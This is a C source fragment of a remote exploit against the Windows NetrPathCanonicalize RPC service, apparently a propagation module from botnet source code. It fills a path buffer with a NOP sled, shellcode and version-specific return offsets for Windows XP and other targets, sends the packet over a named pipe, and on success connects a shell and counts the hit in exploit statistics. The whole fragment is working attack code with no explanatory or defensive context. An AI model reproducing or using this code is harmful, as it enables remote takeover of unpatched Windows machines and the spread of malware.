nPathLen = Targets[ nTarget ].nPathLen;
pPath = (unsigned char*)malloc( nPathLen );
if( !pPath )
{
CloseHandle( hPipe );
return false;
}
memset( pPath, 0x90, nPathLen - 2 );
memset( pPath + nPathLen - 2, 0, 2 );
nBufferPos = Targets[ nTarget ].nShellCodeAddr;
memcpy( pPath + nBufferPos, stack, sizeof( stack ) - 1 );
nBufferPos += sizeof( stack ) - 1;
memcpy( pPath + nBufferPos, scode, sizeof( scode ) - 1 );
nBufferPos += sizeof( scode ) - 1;
nBufferPos = Targets[ nTarget ].nOffsetStartAddr;
if( Targets[ nTarget ].bIsWinXP )
{
memcpy( pPath + nBufferPos, &nOffset2, sizeof( nOffset1 ) );
nBufferPos += 4;
nBufferPos += 8;
memcpy( pPath + nBufferPos, &nOffset1, sizeof( nOffset1 ) );
nBufferPos += 4;
nBufferPos += 32;
memcpy( pPath + nBufferPos, &nOffset1, sizeof( nOffset1 ) );
nBufferPos += 4;
nBufferPos += 8;
memcpy( pPath + nBufferPos, &nOffset1, sizeof( nOffset1 ) );
nBufferPos += 4;
nBufferPos += 32;
nBufferPos += sizeof( wchar_t );
}
else
{
for( size_t n = 0; n < 16; n++ )
memcpy( pPath + nBufferPos + ( n * sizeof( nOffset1 ) ), &nOffset1, sizeof( nOffset1 ) );
}
nPacketSize =
sizeof( PStart )
+ sizeof( UNISTR2 )
+ nPathLen + sizeof( wchar_t ) + 4
+ sizeof( NetrPathCanonicalize_End );
pPacket = (unsigned char*)malloc( nPacketSize );
if( !pPacket )
{
CloseHandle( hPipe );
free( pPath );
return false;
}
memset( pPacket, 0, nPacketSize );
nBufferPos = 0;
memcpy( pPacket, &PStart, sizeof( PStart ) );
nBufferPos += sizeof( NetrPathCanonicalize_Start );
( (UNISTR2*)( pPacket + nBufferPos ) )->length = (UINT32)ceil( (float)nPathLen / sizeof( wchar_t ) );
( (UNISTR2*)( pPacket + nBufferPos ) )->offset = 0;
( (UNISTR2*)( pPacket + nBufferPos ) )->maxlength = ( (UNISTR2*)( pPacket + nBufferPos ) )->length;
nBufferPos += sizeof( UNISTR2 );
memcpy( pPacket + nBufferPos, pPath, nPathLen );
nBufferPos += nPathLen;
while( nBufferPos % 4 )
nBufferPos++;
memcpy( pPacket + nBufferPos, &PEnd, sizeof( PEnd ) );
nBufferPos += sizeof( PEnd );
free( pPath );
memset( &ReqNormalHeader, 0, sizeof( ReqNormalHeader ) );
ReqNormalHeader.NormalHeader.versionmaj = 5;
ReqNormalHeader.NormalHeader.versionmin = 0;
ReqNormalHeader.NormalHeader.type = 0;
ReqNormalHeader.NormalHeader.flags = 3;
ReqNormalHeader.NormalHeader.representation = 0x00000010;
ReqNormalHeader.NormalHeader.authlength = 0;
ReqNormalHeader.NormalHeader.callid = 0;
ReqNormalHeader.prescontext = 0;
ReqNormalHeader.opnum = 0x1f;
memset( &ov, 0, sizeof( ov ) );
ov.hEvent = CreateEvent( NULL, TRUE, FALSE, NULL );
bExit = false;
nCount = 0;
while( !bExit && nCount < MAX_TRIES )
{
nCount++;
if( !SendReqPacket_Part( hPipe, ReqNormalHeader, pPacket, nBufferPos, MAX_FRAG_SIZE, true ) )
break;
if( ov.hEvent )
{
if( !ReadFile( hPipe, RecvBuff, sizeof( RecvBuff ), &nBytesRead, &ov ) && GetLastError() != ERROR_IO_PENDING )
return false;
else
{
if( WaitForSingleObject( ov.hEvent, TRY_TIMEOUT ) == WAIT_TIMEOUT )
{
bExit = true;
ConnectShell (exinfo, 101);
exploit[exinfo.exploit].stats++;
}
}
}
}
CloseHandle( hPipe );
free( pPacket );
if( ov.hEvent )
CloseHandle( ov.hEvent );
if (bExit)
return true;
return false;
}
